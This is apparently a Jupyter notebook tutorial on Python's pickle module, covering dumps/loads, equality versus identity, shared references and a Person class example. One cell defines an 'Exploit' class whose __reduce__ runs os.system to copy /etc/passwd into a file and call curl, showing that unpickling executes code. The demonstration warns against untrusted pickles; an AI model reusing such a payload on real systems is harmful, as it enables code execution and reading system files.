### Pickling

The *pickle* Module
- Is Python specific
- A way to represent an object in a persistent way -> disk, transmission
 - Create an object's representation -> serializing
 - Reload object from representation -> deserializing

Serializing and Deserializing together is called data marshalling or object marshalling

Pickle by default is a binary serialization

As previously mentioned, we will focus on dictionaries, but Pickling can be done on other object types as well!

#### Danger Zone!

Unpickling (deserializing) can execute code
- not safe!

**Only unpickle data you trust**

##### Usage

We import the pickle module

In [1]:
import pickle

This gives us a function called dump
- dump will pickle and object to file

We also have load
- load will unpickle an object from file

We also have the dumps method, which is the same as dump, but instead of sending to a file it returns a (string) pickled representation
- Can be stored in a virable, or saved to file, etc

And there is the loads which like above is the same as load but instead of taking a file it takes a string

#### Equality and Identity

You know the difference between equality and identity. 

If you take a dictionary, pickle it, and then unpickle it, the new dict is a different, equal object

In [None]:
dict1 == dict2 = True
dict1 is dict2 = False

So custom objects will have to implement \_\_eq\_\_ if we want them to be equal

Another note is that while pickling, Python will not re-serialize an object it has already serialized.
- Recursive objects can be pickled
- Shared objects are deserialized as shared objects as well

#### Code Examples

In [2]:
import os
import pickle

In [9]:
class Exploit():
    def __reduce__(self):
        return (os.system, ("cat /etc/passwd > exploit.txt && curl www.google.com >> exploit.txt",))

In [10]:
def serialize_exploit(fname):
    with open(fname, 'wb') as f:
        pickle.dump(Exploit(), f)

In [11]:
serialize_exploit('loadme')

In [12]:
import pickle
pickle.load(open('loadme', 'rb'))

1

Now an exploit file exists in the directory!

The point is to be very very careful what you unpickle!

In [13]:
import pickle

In [14]:
ser = pickle.dumps('Python Pickle Peppers')

In [15]:
ser

b'\x80\x03X\x15\x00\x00\x00Python Pickle Peppersq\x00.'

In [16]:
deser = pickle.loads(ser)

In [17]:
deser

'Python Pickle Peppers'

In [18]:
ser = pickle.dumps(3.14)

In [19]:
ser

b'\x80\x03G@\t\x1e\xb8Q\xeb\x85\x1f.'

In [20]:
deser = pickle.loads(ser)

In [21]:
deser

3.14

In [22]:
d = [10, 20, ('a', 'b', 30)]

In [23]:
ser = pickle.dumps(d)

In [24]:
ser

b'\x80\x03]q\x00(K\nK\x14X\x01\x00\x00\x00aq\x01X\x01\x00\x00\x00bq\x02K\x1e\x87q\x03e.'

In [25]:
deser = pickle.loads(ser)

In [26]:
deser

[10, 20, ('a', 'b', 30)]

In [27]:
id(d)

1648589842312

In [28]:
id(deser)

1648589192904

In [29]:
d == deser

True

In [30]:
s = {'a', 'b', 'x', 10}
ser = pickle.dumps(s)
deser = pickle.loads(ser)
print(id(s), s)
print(id(deser), deser)

1648589571688 {'a', 'x', 10, 'b'}
1648589571464 {'a', 'x', 10, 'b'}


In [31]:
from datetime import datetime
d = {
    'a': 100,
    'b': [1, 2, 3],
    'c': (1, 2, 3),
    'd': {'x': 1 + 1j, 'y': datetime.utcnow()}}

In [32]:
ser = pickle.dumps(d)

In [33]:
ser

b'\x80\x03}q\x00(X\x01\x00\x00\x00aq\x01KdX\x01\x00\x00\x00bq\x02]q\x03(K\x01K\x02K\x03eX\x01\x00\x00\x00cq\x04K\x01K\x02K\x03\x87q\x05X\x01\x00\x00\x00dq\x06}q\x07(X\x01\x00\x00\x00xq\x08cbuiltins\ncomplex\nq\tG?\xf0\x00\x00\x00\x00\x00\x00G?\xf0\x00\x00\x00\x00\x00\x00\x86q\nRq\x0bX\x01\x00\x00\x00yq\x0ccdatetime\ndatetime\nq\rC\n\x07\xe4\x0b\r\x15\x0c\r\x01Dyq\x0e\x85q\x0fRq\x10uu.'

In [35]:
deser = pickle.loads(ser)

In [36]:
deser

{'a': 100,
 'b': [1, 2, 3],
 'c': (1, 2, 3),
 'd': {'x': (1+1j), 'y': datetime.datetime(2020, 11, 13, 21, 12, 13, 83065)}}

In [37]:
deser == d

True

In [38]:
deser is d

False

In [39]:
d1 = {'a': 10, 'b': 20}
d2 = {'x': 100, 'y': d1}

In [40]:
ser = pickle.dumps(d2)

In [41]:
d3 = pickle.loads(ser)

In [42]:
d3

{'x': 100, 'y': {'a': 10, 'b': 20}}

In [43]:
d3['y'] == d2['y']

True

In [44]:
d3['y'] is d2['y']

False

In [45]:
d2['y'] is d1

True

Interesting

In [46]:
d1 = {'a': 1, 'b': 2}
d2 = {'x': 100, 'y': d1, 'z': d1}

In [47]:
d2['y'] is d2['z']

True

In [48]:
ser = pickle.dumps(d2)

In [49]:
deser = pickle.loads(ser)

In [50]:
deser

{'x': 100, 'y': {'a': 1, 'b': 2}, 'z': {'a': 1, 'b': 2}}

In [51]:
deser['y'] is deser['z']

True

In [52]:
d1 = {'a': 1, 'b': 2}
d2 = {'x': 10, 'y': d1}

In [53]:
d1_ser = pickle.dumps(d1)
d2_ser = pickle.dumps(d2)

In [54]:
del d1
del d2

In [55]:
d1 = pickle.loads(d1_ser)
d2 = pickle.loads(d2_ser)

In [57]:
d1

{'a': 1, 'b': 2}

In [58]:
d2

{'x': 10, 'y': {'a': 1, 'b': 2}}

In [59]:
d2['y'] is d1

False

This used to be true, however it is not anymore

This is what happens should you close the program or something of the like and then reopen/ load the serialized data in

In [60]:
d1['c'] = 3

In [61]:
d2

{'x': 10, 'y': {'a': 1, 'b': 2}}

In [62]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __eq__(self, other):
        return self.name == other.name and self.age == other.age
    
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'

In [63]:
john = Person('John Cleese', 79)
eric = Person('Eric Idle', 75)
michael = Person('Michael Palin', 75)

In [64]:
parrot_sketch = {
    'title': 'Parrot Sketch',
    'actors': [john, michael]
}

ministry_sketch = {
    'title': 'The Ministry of Silly Walks',
    'actors': [john, michael]
}

joke_sketch = {
    'title': 'Funniest Joke in the World',
    'actors': [eric, michael]
}

In [65]:
fan_favorites = {
    'user_1': [parrot_sketch, joke_sketch],
    'user_2': [parrot_sketch, ministry_sketch]
}

In [66]:
from pprint import pprint
pprint(fan_favorites)

{'user_1': [{'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'Parrot Sketch'},
            {'actors': [Person(name=Eric Idle, age=75),
                        Person(name=Michael Palin, age=75)],
             'title': 'Funniest Joke in the World'}],
 'user_2': [{'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'Parrot Sketch'},
            {'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'The Ministry of Silly Walks'}]}


In [67]:
parrot_id_original = id(parrot_sketch)

In [68]:
ser = pickle.dumps(fan_favorites)

In [69]:
ser

b'\x80\x03}q\x00(X\x06\x00\x00\x00user_1q\x01]q\x02(}q\x03(X\x05\x00\x00\x00titleq\x04X\r\x00\x00\x00Parrot Sketchq\x05X\x06\x00\x00\x00actorsq\x06]q\x07(c__main__\nPerson\nq\x08)\x81q\t}q\n(X\x04\x00\x00\x00nameq\x0bX\x0b\x00\x00\x00John Cleeseq\x0cX\x03\x00\x00\x00ageq\rKOubh\x08)\x81q\x0e}q\x0f(h\x0bX\r\x00\x00\x00Michael Palinq\x10h\rKKubeu}q\x11(h\x04X\x1a\x00\x00\x00Funniest Joke in the Worldq\x12h\x06]q\x13(h\x08)\x81q\x14}q\x15(h\x0bX\t\x00\x00\x00Eric Idleq\x16h\rKKubh\x0eeueX\x06\x00\x00\x00user_2q\x17]q\x18(h\x03}q\x19(h\x04X\x1b\x00\x00\x00The Ministry of Silly Walksq\x1ah\x06]q\x1b(h\th\x0eeueu.'

In [70]:
new_fan_favorites = pickle.loads(ser)

In [71]:
pprint(new_fan_favorites)

{'user_1': [{'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'Parrot Sketch'},
            {'actors': [Person(name=Eric Idle, age=75),
                        Person(name=Michael Palin, age=75)],
             'title': 'Funniest Joke in the World'}],
 'user_2': [{'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'Parrot Sketch'},
            {'actors': [Person(name=John Cleese, age=79),
                        Person(name=Michael Palin, age=75)],
             'title': 'The Ministry of Silly Walks'}]}


In [72]:
fan_favorites == new_fan_favorites

True

In [75]:
id(fan_favorites['user_1'][0]), id(fan_favorites['user_2'][0])

(1648589507704, 1648589507704)

In [76]:
id(new_fan_favorites['user_1'][0]), id(new_fan_favorites['user_2'][0])

(1648588610360, 1648588610360)

In [77]:
parrot_id_original

1648589507704